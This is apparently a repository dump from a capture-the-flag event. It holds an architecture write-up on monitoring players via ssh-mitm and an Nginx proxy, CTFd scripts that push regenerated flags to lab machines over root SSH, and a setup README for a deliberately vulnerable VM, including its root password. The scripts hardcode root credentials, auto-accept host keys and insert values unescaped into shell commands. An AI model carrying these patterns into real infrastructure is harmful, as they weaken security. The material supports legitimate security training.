├── Game Of Thrones
├── Architecture
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── Architecture.svg
│ │ ├── Log.gif
│ │ ├── dracarys.gif
│ │ ├── game.jpg
│ │ ├── ssh-mitm.svg
│ │ └── trust.gif
├── CTF Platform
│ ├── README.md
│ ├── blitz_overwrite.py
│ ├── completion_checker.sh
│ ├── db_flag_regeneration.py
│ └── total_overwrite.sh
├── Machines
│ ├── Blitz
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── admin-access-denied.png
│ │ │ ├── admin-create-new-product.png
│ │ │ ├── admin-panel-landing.png
│ │ │ ├── burp-intercept-newproduct.png
│ │ │ ├── discovering-sql-error.png
│ │ │ ├── file-upload-1.png
│ │ │ ├── file-upload-2.png
│ │ │ ├── file-upload-3.png
│ │ │ ├── git-gitserver-staging.png
│ │ │ ├── git-ls-la.png
│ │ │ ├── git-pipeline-staging.png
│ │ │ ├── jenkins-app-dashboard.png
│ │ │ ├── jenkins-build.png
│ │ │ ├── jenkins-dashboard.png
│ │ │ ├── jenkins-landing.png
│ │ │ ├── jenkins-login-screen.png
│ │ │ ├── jwt-1.png
│ │ │ ├── jwt-2.png
│ │ │ ├── jwt-3.png
│ │ │ ├── main-landing.png
│ │ │ ├── main-login.png
│ │ │ ├── make-admin-added-new-admin.png
│ │ │ ├── prod-web-root.png
│ │ │ ├── registration-test.png
│ │ │ ├── shell-as-postgres.png
│ │ │ ├── source-code-1.png
│ │ │ ├── sql-0-intercept.png
│ │ │ ├── sql-1-create-table.png
│ │ │ └── sql-2-rce.png
│ │ └── Walkthrough.md
│ ├── Bytescribe
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── Screenshot-2023-10-06-024100.png
│ │ │ └── Screenshot-2023-10-06-035333.png
│ │ └── Walkthrough.md
│ ├── Callobes
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── image-1.png
│ │ │ ├── image-2.png
│ │ │ ├── image-3.png
│ │ │ ├── image-4.png
│ │ │ ├── image-5.png
│ │ │ ├── image-6.png
│ │ │ └── image.png
│ │ └── Walkthrough.md
│ ├── Captivity
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── 80_landing.png
│ │ │ ├── bloodhound-analysis.png
│ │ │ ├── bloodhound-login.png
│ │ │ ├── bloodhound-shortest-path-2.png
│ │ │ ├── bloodhound-shortest-path.png
│ │ │ ├── file-hosting-dashboard-2.png
│ │ │ ├── file-hosting-dashboard.png
│ │ │ ├── file-hosting-landing.png
│ │ │ ├── file-hosting-login.png
│ │ │ ├── file-hosting-upload-exploit-2.png
│ │ │ ├── file-hosting-upload-exploit.png
│ │ │ ├── file-hosting-upload.png
│ │ │ ├── google-exploit.png
│ │ │ └── neo4j-initialize.png
│ │ └── Walkthrough.md
│ ├── Gitlab
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ └── image-1.png
│ │ └── Walkthrough.md
│ ├── NoteApp
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ └── image-1.png
│ │ └── Walkthrough.md
│ └── README.md
└── README.md
├── README.md
└── Who Am I
├── README.md
├── Writeups
├── C1 - Death Token Challenge
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image.jpg
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ └── image4.png
├── C10 - Shadows Possession Jutsu
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 12.png
│ │ ├── image 2.png
│ │ ├── image 3.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ └── image.png
├── C11 - Serial Escape
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── 2024-09-25_17h29_25.png
│ │ ├── 2024-09-25_17h30_17.png
│ │ ├── 2024-09-25_17h30_48.png
│ │ ├── 2024-09-25_17h31_16.png
│ │ ├── 2024-09-25_17h36_49.png
│ │ ├── 2024-09-25_17h38_46.png
│ │ ├── 2024-09-25_17h39_16.png
│ │ ├── 2024-09-25_17h39_31.png
│ │ ├── 2024-09-25_17h39_50.png
│ │ ├── 2024-09-25_17h41_34.png
│ │ ├── 2024-09-25_17h41_42.png
│ │ ├── 2024-09-25_17h45_54.png
│ │ ├── 2024-09-25_17h54_27.png
│ │ ├── 2024-09-25_18h12_04.png
│ │ ├── 2024-09-25_18h22_19.png
│ │ ├── 2024-09-25_18h24_52.png
│ │ ├── 2024-09-25_18h30_58.png
│ │ ├── 2024-09-25_18h33_34.png
│ │ ├── 2024-09-25_18h34_12.png
│ │ ├── 2024-09-25_18h35_11.png
│ │ ├── 2024-09-25_18h56_23.png
│ │ └── 2024-09-27_22h13_01.png
├── C12 - Mr. Windoclin
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── cms-admin-dashboard.png
│ │ ├── cms-admin-panel.png
│ │ ├── cms-hostname-revealed.png
│ │ ├── cms-rce.png
│ │ ├── cms-redirects.png
│ │ ├── cms-reverse-shell.png
│ │ ├── docker-compose-file.png
│ │ ├── ftp-session.png
│ │ ├── github-osint-2.png
│ │ ├── github-osint-3.png
│ │ ├── github-osint.png
│ │ ├── machine-exploited.png
│ │ ├── prepare-exploit.png
│ │ ├── shared-folder.png
│ │ ├── wbce-cms-googled.png
│ │ ├── wbce-cms.png
│ │ ├── windows-enum.png
│ │ └── windows-shared-folder.png
├── C2 - Decode the Escape
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ ├── figure-7.png
│ │ ├── figure-8.png
│ │ └── figure-9.png
├── C3 - ANAIS_WATT3RS0N
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ ├── image4.png
│ │ ├── image5.png
│ │ └── image6.png
├── C4 - #exec cmd=whoami
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ ├── figure-7.png
│ │ ├── figure-8.png
│ │ └── figure-9.png
├── C5 - Packet Detective
│ ├── README.md
│ ├── Writeup.md
│ ├── challenge.pcapng
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ └── figure-7.png
├── C6 - Exorcising Sukuna’s Curse
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── ctf2.png
│ │ ├── image 01.jpg
│ │ ├── image 02.png
│ │ ├── image 03.png
│ │ ├── image 04.png
│ │ ├── image 05.png
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 12.png
│ │ ├── image 13.png
│ │ ├── image 14.png
│ │ ├── image 15.png
│ │ ├── image 16.png
│ │ ├── image 17.png
│ │ ├── image 18.png
│ │ ├── image 19.png
│ │ ├── image 2.png
│ │ ├── image 20.png
│ │ ├── image 21.png
│ │ ├── image 22.png
│ │ ├── image 23.png
│ │ ├── image 24.png
│ │ ├── image 25.png
│ │ ├── image 26.png
│ │ ├── image 27.png
│ │ ├── image 28.png
│ │ ├── image 29.png
│ │ ├── image 3.png
│ │ ├── image 30.png
│ │ ├── image 31.png
│ │ ├── image 32.png
│ │ ├── image 33.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ ├── image.png
│ │ └── imagee.png
├── C7 - Root Reaper Quest
│ ├── README.md
│ ├── audit.log
│ ├── images
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ ├── image4.png
│ │ ├── image5.png
│ │ ├── image6.jpg
│ │ └── image6.png
│ └── writeup.md
├── C8 - In Quest for Rogue Dragon
│ ├── Images
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 2.png
│ │ ├── image 3.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ ├── image.png
│ │ └── imageee.png
│ ├── README.md
│ ├── Writeup.md
│ └── rev.exe
└── C9 - End of Rumbling
│ ├── README.md
│ ├── images
│ ├── esasimage.png
│ ├── image 1.png
│ ├── image 10.png
│ ├── image 11.png
│ ├── image 12.png
│ ├── image 13.png
│ ├── image 14.png
│ ├── image 15.png
│ ├── image 16.png
│ ├── image 17.png
│ ├── image 18.png
│ ├── image 19.png
│ ├── image 2.png
│ ├── image 20.png
│ ├── image 21.png
│ ├── image 3.png
│ ├── image 4.png
│ ├── image 5.png
│ ├── image 6.png
│ ├── image 7.png
│ ├── image 8.png
│ ├── image 9.png
│ └── image.png
│ └── writeup.md
└── ctf_submission_logs.csv
/Game Of Thrones/Architecture/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/README.md
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/Writeup.md:
--------------------------------------------------------------------------------
1 | # Did the Winter really come to Westeros? Engineering the GoT CTF
2 |
3 |
4 | # Introduction
5 |
6 | This is supposed to be an abstraction to the technical preparation timeline of the CTF “Game Of Thrones”. The write-up will be a really objective (second-person) view (our honest confession) of our design, plans, choices, pros and cons, what we did well and didn’t throughout the process.
7 |
8 | “Game of Thrones” - **a power struggle: who has it, who wants it and how they plan to get it.**
9 |
10 | This is now your view as the Challenger of The Throne:
11 |
12 | **In the perilous realm of Westeros, flags hold power as coveted as the Iron Throne itself. Dive into the intricate web of challenges, where every capture brings you closer to ruling the Seven Kingdoms. Beware, for in this game of flags, you win or you lose. Only the cunning and brave will seize the throne and reign supreme.**
13 |
14 | This was the player’s challenge to overcome but what about the Throne, how is it choosing the Next Ruler? What are the sacrifices and risks the player needs to take while fighting their way through it? Let’s Build our Throne waiting for its Next Ruler to come!
15 |
16 | 
17 |
18 | ### Deep Note
19 |
20 | This is not a really Deep-Dive Engineering blog which intents to surprise the reader while solving a complex riddle of great technological problem.
21 |
22 | It is just a Not-So-Technical blog of nerdy Non-Engineers Engineering their way to try to find answers to bunch of their dummy what-if questions.
23 |
24 | Did we really overcome the Winter? What about White walkers? Will see it together!
25 |
26 | # Challenges of Building a Throne
27 |
28 | Our final goal was to implement a CTF environment to fulfill the following ideas:
29 |
30 | - Not any kind of regulations by design - No rules will be conditioned to players, no ethics applied!
31 | - The CTF machines will be Same-Machine-All-Players - Any challenge machine will have just one instance at the given time period and all players will have to find their way out through that same machine.
32 | - As any player can have malicious intent (remember, no ethics applied!) inside machines, there will be no restriction. However, players can be caught by The City Watch(police) while or after committing a crime! So we needed to implement our version of “The City Watch”.
33 |
34 | In summary, we were supposed to implement a ‘healthy’ infrastructure to maintain a consistent, unbroken scheme throughout the CTF lifecycle.
35 |
36 | ## Design Challenges
37 |
38 | - Source of trust - static points that can’t be interfered by players (of any intent).
39 | - Logging - Implementing a consistent logging mechanism and what to do with the collected logs.
40 | - Automation - Being able to trigger vital actions (arguably complex for fully manual work) for keeping things in control.
41 | - Design of Infrastructure - Resource planning and optimization of structure elements.
42 |
43 | Time For Some Solutions!
44 |
45 | # Overcoming (Building The Throne)
46 |
47 | ## Discovering Source of Trust
48 |
49 | We first tried to make or find a solid Source of Trust Point(s) in the CTF Architecture so it would grant us to have complete control over the structure with the goal of keeping the system consistent and have more resistance.
50 |
51 | 
52 |
53 | **Proxy ’em all!**
54 |
55 | Our initial thought was to implement some kind of a logical proxy. Theoretically, having first-hand control before and/or after players compromised the vulnerable machines.
56 |
57 | If we were able to implement this proxy logic, that would have been our actual Source of Trust!
58 |
59 | ## Logging The Unknown
60 |
61 | This was a bit challenging as we needed to log the actions of each player to be able to trace any issue that arose. Since all players would play in the same perimeter, we had to monitor malicious actions and revert the machines in a way that doesn’t disturb the ctf cycle.
62 |
63 | As these logs will play crucial role on the structure they should not be intervened in any ways.
64 |
65 | **Conclusion**
66 |
67 | After some (and some more) failed attempts, we came to a conclusion that we needed to find a way to log the OS level actions (commands), independent of access types (like ssh, ftp, or any other). If we would not be able to handle this universally, it would be disastrous as each protocol(thousands of ’em!) has its own characteristics to handle.
68 |
69 | So here, the “Source of Trust” proxy idea came to our mind! If our proxy was able to handle traffic universally (one entry point), we could use it in some way for standardized logging!
70 |
71 | For “One Entry Point” idea, we wanted to use SSH. Initially, it was a great idea! But How we can log SSH?
72 |
73 | **One** **ssh-mitm to rule ‘em all!**
74 |
75 | ***[SSH-MITM](https://github.com/ssh-mitm/ssh-mitm)** is a man in the middle SSH Server for security audits and malware analysis.*
76 |
77 | 
78 |
79 | Basically we wanted to intercept all the traffic through the ssh server and hopefully being able to log them all, in which it lead us to another problem. If we settled on ssh-mitm to be utilized, where would it connect to(ssh forwarding)?
80 |
81 | Again after some attempts and failures, we came up with an idea to make use of some Intermediary system(s) to operate from. That’s when we decided to put the “Attack Box” logic into action - It is a well-known way of providing the players with a stable/predefined attack machine environment to engage with and launch attacks from to target system.
82 |
83 | We initially employed this logic as an SSH endpoint to connect through SSH-MITM, improving the reliability and consistency of our system for all users.
84 |
85 | **Web of web**
86 |
87 | Later We also decided to proxy the HTTP traffic separately from directly Nginx - The HTTP, by itself, covers most network traffic(so in our CTF). Additionally, requiring CTF players to connect via the command line interface (SSH) would pose a significant challenge when testing for web application vulnerabilities. That meant they would be unable to engage with well-known web application pentesting tools (like Burpsuite, ZAP, etc).
88 |
89 | Now our logging environment is defined and after some custom configurations to ssh-mitm tool and Nginx proxy itself we were able to *capture the unknown*!
90 |
91 | 
92 |
93 | ## Some Automation?
94 |
95 | Much of the automation was revolved on the flag mechanism, which plays a vital role in the CTF platform.
96 |
97 | Under the hood, we used CTFd platform, an excellent open-source tool designed for Capture The Flag scenarios with user-friendly interface and high degree of customizability.
98 |
99 | With the goal of making the flag mechanism (generation, submission, and pushing) reliable, we implemented automation according to our Capture The Flag (CTF) strategy and requirements. We’ll not get into details but provide with a general overview of customization and the role of automation:
100 |
101 | - Flag Regeneration - to (re)generate flags under certain conditions (e.g. preventing the reuse of the same flag)
102 | - Flag Submission - to notify a particular team’s progress in machine solving (such as locating all flags), and subsequently enabling us to take protective measures (such as disabling that team’s access to the machine as a security measure).
103 | - Flag Placement - To upload (re)generated flags to CTF machines and provide notifications in case of failed push actions (identifying network errors and/or malicious actions of players), allowing us, for instance, to take certain measures like reverting damaged machines.
104 |
105 | **Note** - These are the most over-simplified versions and with filtered actions not listed, just a very general description of them.
106 |
107 | Now that we’ve discussed everything that brings us to the finalization, let’s take a look at the actual scheme!
108 |
109 | ## Design of Infrastructure
110 |
111 | 
112 |
113 | This is a somewhat simplified version of the general architecture of the GoT CTF!
114 |
115 | Let’s summarize the design flow:
116 |
117 | - Players test web apps (HTTP) hosted in vulnerable machines - directly proxied through Nginx with virtual hosting (for solving port and/or service/daemon collision) to the ctf machines.
118 | - Players test other services hosted in vulnerable machines - Proxied through Nginx to an ssh-mitm instance and then forwarded to actual SSH server of the Attack box, then to underlying daemon.
119 | - Attack boxes are not allowed to have HTTP connectivity with CTF machines - for not violating our “HTTP Proxy” logic.
120 | - SSH-MITM and HTTP Proxy logs are forwarded to Elasticsearch instance for indexing and storage.
121 | - CTF players have direct access to CTF Platform (CTFd) and Elasticsearch instance (Blue Teaming).
122 | - Scripts inside the machine, in which CTFd is deployed, are pushing the flags (that are regenerated frequently) constantly (every 2 minutes) to vulnerable machines. And if the pushing is failed it is notifying us with Telegram(for detecting the possible intrusion).
123 |
124 | As this is our final design, before achieving it we did have some sub-paths we followed but eliminated through the time. Let’s see some of them.
125 |
126 | ### Failures of the Success
127 |
128 | Most Stand Out(Critical) Design Eliminations:
129 |
130 | - Logging the actions and traffic directly from CTF machines was the most straightforward and convenient choice initially. In fact, this was the motivation behind seeking a Static Source of Trust (for obvious reasons) that would remain untouched.
131 | - Ssh tunneling - We initially thought to make use of ssh as a tunnel. Our plan was to force player devices to connect through this ssh tunnel. However, we realized that, even if the ssh tunnel is employed, it would still be end-to-end communication. What that means is we would not be able to intercept it again as the connection would still be a protocol-based activity (no static point logic achieved actually). As a result, we ruled out this option.
132 | - To establish an SSH connection from ssh-mitm, we required an intermediary boundary, as discussed earlier. Initially, we considered forwarding that connection directly to Nginx for the simplicity. However, we realized that this approach posed a significant problem. If a player (potentially malicious) managed to execute commands, even with limited privileges, it would still compromise our “Source of Trust”. As a result, we decided to discard this option.
133 | - And the list can go on like that!
134 |
135 | # Conclusion
136 |
137 | So this is a refined version of tons of failed attempts, a showcase, right?! Maybe!
138 |
139 | While building the CTF with the given time and resource limitations, we did try to reveal something tangible that would catch the promise. The Architecture may have some weaker points depending on the viewer(so for us too), which is the raw idea, that we were able to make the concrete out of it at least to some point. Hence, is definitely open for further development and refinement!
140 |
141 | It is crucial to recognize that the act of creation frequently necessitates the deconstruction and subsequent reconstruction of an entity, allowing for its continual reemergence.
142 |
143 | Now Let the fun begin! Dracarys!
144 |
145 | 
146 |
147 | **Perchance the winter has descended upon us, but the Night King, he hath not emerged in this season’s cold embrace!**
148 |
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/Log.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/Log.gif
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/dracarys.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/dracarys.gif
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/game.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/game.jpg
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/trust.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/trust.gif
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/blitz_overwrite.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import paramiko
3 | import sys
4 |
5 | # Replace with your actual Bearer token and category_variable
6 | bearer_token = "ctfd_sampleToken"
7 | machine ="blitz"
8 | server_ip="10.20.52.2"
9 |
10 | ssh_username="root"
11 |
12 | ssh_password="PasswordOfRoot"
13 |
14 | # Define the URL for the initial request
15 | initial_url = f"http://localhost:8000/api/v1/challenges?category={machine}"
16 |
17 | # Set headers with the Bearer token
18 | headers = {
19 | "Authorization": f"Token {bearer_token}",
20 | "Content-Type":"application/json"
21 |
22 | }
23 |
24 | ssh_client=paramiko.SSHClient()
25 | ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
26 |
27 | def send_telegram_message(text):
28 | message_data = {
29 | 'chat_id' : 'TelegramGroupChatId',
30 | 'text' : 'Overwriter script - error in Blitz machine - ' + text
31 | }
32 | requests.post("https://api.telegram.org/botTokenProvidedByTelegram/sendMessage",data=message_data)
33 |
34 |
35 | try:
36 | ssh_client.connect(server_ip,username=ssh_username,password = ssh_password,timeout=10)
37 | except:
38 | send_telegram_message("no SSH access")
39 | sys.exit()
40 |
41 | try:
42 | # Make the initial request to get challenges
43 | response = requests.get(initial_url, headers=headers)
44 | # Check if the initial request was successful (status code 200)
45 | if response.status_code == 200:
46 | challenges = response.json()["data"]
47 |
48 | # Iterate over the list of challenges
49 | for challenge in challenges:
50 | challenge_id = challenge["id"]
51 | challenge_name = challenge["name"]
52 | # Define the URL for the second request using the challenge_id
53 | flags_url = f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}"
54 |
55 | # Make the second request for flags
56 | response = requests.get(flags_url, headers=headers)
57 | # Check if the second request was successful (status code 200)
58 | if response.status_code == 200:
59 | flag = response.json()["data"][0]["content"]
60 | if challenge_name == "user1.txt":
61 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /user1.txt ; echo {flag}> /user1.txt")
62 | error_message = stderr.read()
63 | if(error_message):
64 | send_telegram_message(error_message.decode('utf-8'))
65 | print("ERROR" + error_message.decode('utf-8'))
66 | print(f"SSHing {flag} into /user1.txt")
67 | elif challenge_name == "user2.txt":
68 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /home/git/user2.txt ; cd /home/git && touch user2.txt && echo {flag}> user2.txt && chown git:git user2.txt && chmod 600 user2.txt")
69 | error_message = stderr.read()
70 | if(error_message):
71 | send_telegram_message(error_message.decode('utf-8'))
72 | print("ERROR" + error_message.decode('utf-8'))
73 | print(f"SSHing {flag} into /home/git/user2.txt")
74 | elif challenge_name == "user3.txt":
75 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /home/node/user3.txt ; cd /home/node && touch user3.txt && echo {flag}> user3.txt && chown node:node user3.txt && chmod 600 user3.txt")
76 | error_message = stderr.read()
77 | if(error_message):
78 | send_telegram_message(error_message.decode('utf-8'))
79 | print("ERROR" + error_message.decode('utf-8'))
80 |
81 | print(f"SSHing {flag} into /home/node/user3.txt")
82 | elif challenge_name == "root.txt":
83 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /root/root.txt ; echo {flag}> /root/root.txt")
84 | error_message = stderr.read()
85 | if(error_message):
86 | send_telegram_message(error_message.decode('utf-8'))
87 | print("ERROR" + error_message.decode('utf-8'))
88 |
89 | print(f"SSHing {flag} into /root/root.txt")
90 | else:
91 | print("ERROR . CHALLENGE NOT FOUND IN OVERWRITE BLITZ")
92 | else:
93 | print(f"BLITZ Failed to retrieve flags for Challenge {challenge_id}. Status Code: {response.status_code}")
94 | else:
95 | print(f"BLITZ Failed to retrieve challenges. Status Code: {response.status_code}")
96 | except Exception as e:
97 | send_telegram_message(str(e))
98 | print(f"BLITZ An error occurred: {str(e)}")
99 |
100 | ssh_client.close()
101 |
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/completion_checker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | team_id=$1
4 | team_name=$2
5 | challenge_category=$3
6 |
7 | if [ $# -ne 3 ]; then
8 | exit 1
9 | fi
10 |
11 | challenge_ids=($(curl -sS -X GET http://localhost:8000/api/v1/challenges?category=$challenge_category --header "Authorization: Token ctfd_sampletoken" --header "Content-Type: application/json" | jq -r '.data[].id'))
12 |
13 | allChallengesOfMachineCompleted=true
14 |
15 | for id in "${challenge_ids[@]}"; do
16 |
17 | submission_result_count=$(curl -sS -X GET "http://localhost:8000/api/v1/submissions?team_id=${team_id}&challenge_id=${id}&type=correct" --header "Authorization: Token ctfd_sampletoken" --header "Content-Type: application/json" | jq -r '.meta.pagination.total')
18 |
19 | if [ "$submission_result_count" -ne 1 ]; then
20 | allChallengesOfMachineCompleted=false
21 | fi
22 |
23 | done
24 |
25 | if [ ${#challenge_ids[@]} -eq 0 ]; then
26 |
27 | allChallengesOfMachineCompleted=false
28 |
29 | fi
30 |
31 | if [ "$allChallengesOfMachineCompleted" = true ]; then
32 |
33 | curl -sS -X GET "https://api.telegram.org/botTokenProvidedByTelegram/sendMessage?chat_id=groupChatIdHere&text=Team_$(echo $team_id)_finished_machine_$(echo $challenge_category)"
34 |
35 | fi
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/db_flag_regeneration.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import json
4 | import hashlib
5 | import datetime
6 |
7 | def main(argv):
8 | option = argv[0]
9 | if(option):
10 | request_url=""
11 | bearer_token="ctfd_sampletoken"
12 | if(option == "--all"):
13 | request_url="http://localhost:8000/api/v1/challenges"
14 | print("Generating flags in DB for all machines.")
15 | elif(option != ''):
16 | request_url=f"http://localhost:8000/api/v1/challenges?category={option}"
17 | print(f"Generating flags in DB for {option} machine")
18 |
19 | headers = {
20 | "Authorization": f"Token {bearer_token}",
21 | "Content-Type":"application/json"
22 | }
23 |
24 | challenges_response = requests.get(request_url, headers=headers)
25 | if challenges_response.status_code == 200:
26 | challenges = challenges_response.json()["data"]
27 | for challenge in challenges:
28 | challenge_id=challenge["id"]
29 | challenge_name=challenge["name"]
30 | machine = challenge["category"]
31 | flags_response=requests.get(f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}", headers=headers)
32 | if flags_response.status_code == 200:
33 | flag = flags_response.json()["data"][0]
34 | flag_id = flag["id"]
35 |
36 | ct = str(datetime.datetime.now())
37 | pre_hash= ct + ";" + str(flag_id) + ";" + str(machine) + ";" + str (challenge_name)
38 | new_flag_hash=hashlib.md5(pre_hash.encode('utf-8')).hexdigest()
39 | new_flag=f"ICSD{{{new_flag_hash}}}"
40 | flag_change_data = {
41 | 'content':f'{new_flag}',
42 | 'data':'',
43 | 'type':'static',
44 | 'id': f'{flag_id}'
45 | }
46 | flag_regenerate_response = requests.patch(f"http://localhost:8000/api/v1/flags/{flag_id}", data=json.dumps(flag_change_data), headers=headers)
47 | if __name__ == "__main__":
48 | main(sys.argv[1:])
49 |
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/total_overwrite.sh:
--------------------------------------------------------------------------------
1 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/blitz_overwrite.py &
2 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/captivity_overwrite.py &
3 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_overwrite.py &
4 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_docker_overwrite.py &
5 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/noteapp_overwrite.py &
6 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/gitlab_overwrite.py &
7 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/callobes_overwrite.py &
8 |
9 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 | > [!WARNING]
6 | > The images are not supported by virtualbox.
7 |
8 | 3. Choose a Virtual Machine name and location for the new VM.
9 | 4. The default Network Interface is configured as NAT. If not, please do so.
10 | 5. You can find IP address of the machine using arp-scan in your kali machine.
11 | ```
12 | ┌──(kali㉿kali)-[~/Captivity]
13 | └─$ sudo arp-scan -l
14 | [sudo] password for kali:
15 |
16 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
17 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
18 | 192.168.100.1 00:50:56:c0:00:08 VMware, Inc.
19 | 192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc.
20 | 192.168.100.131 00:0c:29:d5:b9:3e VMware, Inc.
21 | 192.168.100.254 00:50:56:fa:13:b9 VMware, Inc.
22 |
23 | 4 packets received by filter, 0 packets dropped by kernel
24 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 4 responded
25 |
26 | ┌──(kali㉿kali)-[~/Captivity]
27 | └─$ ssh root@192.168.100.131
28 | root@192.168.100.131's password:
29 | Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-33-generic x86_64)
30 |
31 | * Documentation: https://help.ubuntu.com
32 | * Management: https://landscape.canonical.com
33 | * Support: https://ubuntu.com/advantage
34 |
35 | 68 updates can be applied immediately.
36 | 22 of these updates are standard security updates.
37 | To see these additional updates run: apt list --upgradable
38 |
39 | Last login: Thu Sep 28 09:13:52 2023 from 192.168.100.1
40 | root@blitz:~# exit
41 | logout
42 | Connection to 192.168.100.131 closed.
43 | ```
44 | 6. If something goes wrong, use the credentials provided below to access the machine.
45 |
46 | # Credentials
47 | ```
48 | root:3AsaFRMwkdmBMQwuC4sr
49 | ```
50 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png:
--------------------------------------------------------------------------------
